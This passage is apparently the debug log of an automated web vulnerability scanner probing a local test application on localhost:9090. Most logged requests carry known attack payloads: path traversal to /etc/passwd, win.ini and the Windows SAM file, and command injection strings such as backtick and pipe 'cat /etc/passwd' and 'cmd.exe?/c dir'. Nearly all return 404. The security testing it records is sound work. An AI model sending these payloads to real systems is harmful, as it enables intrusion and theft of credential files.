http://localhost:9090/fi?/etc/passwd= returned HTTP code "404" (id=25061,from_cache=0,grep=1,rtt=0.13,did=GUt7m92a) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/admin/phpinfo.php returned HTTP code "404" (id=25062,from_cache=0,grep=1,rtt=0.17,did=HAqiAyEd) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_vti_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir= returned HTTP code "404" (id=25064,from_cache=0,grep=1,rtt=0.11,did=WhFZ4pOc) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4567. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/jsp/pageDouble.jsp returned HTTP code "404" (id=25070,from_cache=0,grep=1,rtt=0.19,did=jqZtc9gU) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/eshop.pl/seite=;cat eshop.pl| returned HTTP code "404" (id=25073,from_cache=0,grep=1,rtt=0.14,did=QZxcKzJ8) [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:346 / in_use:6 / max:50 / total:352) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (37b2c1ff2509192a, 0.28 sec) (6bba80c72ffce3d7, 0.16 sec) (304d52af6ddbfdfd, 0.07 sec) (23604fe6aca417f0, 0.04 sec) (041c095c7ec52979, 0.03 sec) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/@VBULLETINcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma="&echo \'\'=& echo `id `=&die()=&echo"= returned HTTP code "404" (id=25066,from_cache=0,grep=1,rtt=0.10,did=pOi3A95t) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/htimage.exe returned HTTP code "404" (id=25074,from_cache=0,grep=1,rtt=0.12,did=ikDVTryE) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini= returned HTTP code "404" (id=25071,from_cache=0,grep=1,rtt=0.20,did=ddsWFeLR) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/syshelp/cscript/showfncs.stm?pkg= returned HTTP code "404" (id=25072,from_cache=0,grep=1,rtt=0.09,did=OX3pK3Ma) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/ban.bak returned HTTP code "404" (id=25069,from_cache=0,grep=1,rtt=0.11,did=3aOFC9ig) [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/47/") took 0.16s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/47/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sysuser/docmgr/edit.stm?path= returned HTTP code "404" (id=25076,from_cache=0,grep=1,rtt=0.05,did=et0W9aOr) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/postnuke/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK returned HTTP code "404" (id=25075,from_cache=0,grep=1,rtt=0.10,did=IhTWKwbx) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4568. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/FileSeek2.cgi?head=&foot=&cat /etc/passwd= returned HTTP code "404" (id=25078,from_cache=0,grep=1,rtt=0.03,did=diSxkcso) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/servlet/webacc returned HTTP code "404" (id=25079,from_cache=0,grep=1,rtt=0.08,did=d6Nx8Au1) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.nl returned HTTP code "404" (id=25082,from_cache=0,grep=1,rtt=0.05,did=ZM58Kg7M) [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/47/") took 0.06s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2526. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1 returned HTTP code "404" (id=25081,from_cache=0,grep=1,rtt=0.27,did=ZUivMq4c) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/php/index.php returned HTTP code "404" (id=25077,from_cache=0,grep=1,rtt=0.03,did=ROsanHm5) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/postnuke/html/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK returned HTTP code "404" (id=25080,from_cache=0,grep=1,rtt=0.17,did=9Ue9eyiL) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/iissamples/issamples/ixqlang.htm returned HTTP code "404" (id=25084,from_cache=0,grep=1,rtt=0.09,did=amcLK7cC) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/manual/images/ returned HTTP code "404" (id=25089,from_cache=0,grep=1,rtt=0.05,did=PpLLptGM) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sysuser/docmgr/template.stm?path= returned HTTP code "404" (id=25085,from_cache=0,grep=1,rtt=0.10,did=6mREUOJK) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES//default.asp returned HTTP code "404" (id=25088,from_cache=0,grep=1,rtt=0.10,did=1hEMRy6j) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4569. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2527. [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=25086,from_cache=0,grep=0,rtt=0.34,did=eXABXYbB) [Wed Feb 12 10:04:37 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: eXABXYbB) [Wed Feb 12 10:04:37 2020 - debug] detailed._login() took 1.07s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/VsSetCookie.exe returned HTTP code "404" (id=25083,from_cache=0,grep=1,rtt=0.21,did=h4ocjlSU) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4570. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2528. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_vti_bin/..\xc0\xaf../..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe?/c dir= returned HTTP code "404" (id=25092,from_cache=0,grep=1,rtt=0.24,did=gf8fNW9r) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_layouts/settings.htm returned HTTP code "404" (id=25091,from_cache=0,grep=1,rtt=0.08,did=u7B35FDs) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/shoutbox.php?conf=../../../../../../../etc/passwd returned HTTP code "404" (id=25087,from_cache=0,grep=1,rtt=0.14,did=hXXp7woO) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/cvslog.cgi?file= returned HTTP code "404" (id=25093,from_cache=0,grep=1,rtt=0.23,did=j7vJRTi5) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/.htaccess returned HTTP code "404" (id=25000,from_cache=0,grep=1,rtt=0.08,did=ZOX8HxHK) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/texis.exe/junk returned HTTP code "404" (id=25094,from_cache=0,grep=1,rtt=0.14,did=Qb6aJ9qv) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/admin/db.php?dump_sql=1 returned HTTP code "404" (id=25090,from_cache=0,grep=1,rtt=0.11,did=Ot5LAoOu) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2529. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2530. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4570. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4570. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2531. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4571. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_private/form_results.html returned HTTP code "404" (id=25096,from_cache=0,grep=1,rtt=0.05,did=xHBBYsbl) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/@PHPINFODIRS@PHPINFOFILES returned HTTP code "404" (id=25097,from_cache=0,grep=1,rtt=0.11,did=vnVRKa34) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/opendir.php?requesturl=/etc/passwd returned HTTP code "404" (id=25099,from_cache=0,grep=1,rtt=0.11,did=8ffttNnO) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ru.utf8 returned HTTP code "404" (id=25095,from_cache=0,grep=1,rtt=0.03,did=uMK7bBiY) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/debug/dbg?host=== returned HTTP code "404" (id=25098,from_cache=0,grep=1,rtt=0.11,did=FVgtRT73) [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:353 / in_use:5 / max:50 / total:358) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (1339540c5adcb3f8, 0.16 sec) (6987f2b916a8faec, 0.12 sec) (6a86fca9f78bea4c, 0.09 sec) (232244f8f6d4862f, 0.02 sec) (304d52af6ddbfdfd, 0.01 sec) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/stronghold-info returned HTTP code "404" (id=25101,from_cache=0,grep=1,rtt=0.10,did=4dTl3zaI) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.et returned HTTP code "404" (id=25102,from_cache=0,grep=1,rtt=0.01,did=vX4McbqZ) [Wed Feb 12 10:04:37 2020 - debug] symfony.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] svn_users.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/images/ returned HTTP code "404" (id=25107,from_cache=0,grep=1,rtt=0.20,did=p7VvrEZB) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/firewall/policy/policy?fzone=internal&tzone=dmz1 returned HTTP code "404" (id=25109,from_cache=0,grep=1,rtt=0.21,did=6jXNdunC) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/certsrv/..\xc0\xaf../winnt/system32/cmd.exe?/c dir= returned HTTP code "404" (id=25112,from_cache=0,grep=1,rtt=0.01,did=viwkMHeq) [Wed Feb 12 10:04:37 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2532. [Wed Feb 12 10:04:37 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] expect_ct.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] file_upload.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini= returned HTTP code "404" (id=25113,from_cache=0,grep=1,rtt=0.10,did=OdOGWgpn) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/ban.dat returned HTTP code "404" (id=25108,from_cache=0,grep=1,rtt=0.05,did=jUow6gjf) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/com/novell/webaccess/help/en/default.htm returned HTTP code "404" (id=25106,from_cache=0,grep=1,rtt=0.18,did=0t7O5Eex) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/admin/exec.php3?cmd=dir c:\\\\ returned HTTP code "404" (id=25104,from_cache=0,grep=1,rtt=0.07,did=4GayeP4s) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/iissamples/exair/howitworks/Code.asp returned HTTP code "404" (id=25110,from_cache=0,grep=1,rtt=0.07,did=hnJXxXbY) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4572. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/..%2f..%2f..%2f..%2f..%2f../winnt/repair/sam returned HTTP code "404" (id=25100,from_cache=0,grep=1,rtt=0.15,did=SWYw1kWi) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/shop/member_html.cgi?file=|cat /etc/passwd| returned HTTP code "404" (id=25111,from_cache=0,grep=1,rtt=0.17,did=g0YIe6AO) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/mlog.html returned HTTP code "404" (id=25105,from_cache=0,grep=1,rtt=0.23,did=Unt6ukPf) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_vti_bin/ returned HTTP code "404" (id=25103,from_cache=0,grep=1,rtt=0.12,did=FgMEEZ4z) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/servlet/webpub returned HTTP code "404" (id=25115,from_cache=0,grep=1,rtt=0.15,did=GsGyvWbM) [Wed Feb 12 10:04:37 2020 - debug] private_ip.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] motw.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] retirejs.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:37 2020 - debug] serialized_object.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] blank_body.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] credit_cards.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] websockets_links.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] csp.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/63/") took 0.06s to run [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2533. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4573. [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/63/") took 0.09s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/postnuke/html/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK returned HTTP code "404" (id=25114,from_cache=0,grep=1,rtt=0.04,did=8Judhsth) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/securelogin/1,2345,A,00.html returned HTTP code "404" (id=25119,from_cache=0,grep=1,rtt=0.16,did=rDvElcv8) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/FileSeek2.cgi?head=&cat /etc/passwd|=&foot= returned HTTP code "404" (id=25121,from_cache=0,grep=1,rtt=0.03,did=Yz6asdJS) [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/63/") took 0.11s to run [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4574. [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/63/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.nn returned HTTP code "404" (id=25116,from_cache=0,grep=1,rtt=0.20,did=uttgp6WK) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/XSQLConfig.xml returned HTTP code "404" (id=25118,from_cache=0,grep=1,rtt=0.15,did=MXXuOU2V) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4575. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat /etc/passwd` returned HTTP code "404" (id=25120,from_cache=0,grep=1,rtt=0.20,did=wHI2jl1L) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd= returned HTTP code "404" (id=25117,from_cache=0,grep=1,rtt=0.12,did=5QHMxGCh) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/e3RsQPC4vKEwzSPbeZGg7C4XfW7iGiSjNtg9WHhhVjcBsdMb3SdBRm84S53EqSJrM63PMnxRaxybuaeGL1FkNptJlRrCptwv91WAZ73lNt0mOoBeE8LBNvvzzn8KcZfFgpAePBsKBMqjxeYnYFR6rKg4E8padaMBcgNZH50gBCiUiUXxSMxUFLbY61sbTmGQFZQOXs304zMUDkhoSRmS7A28clKRkqe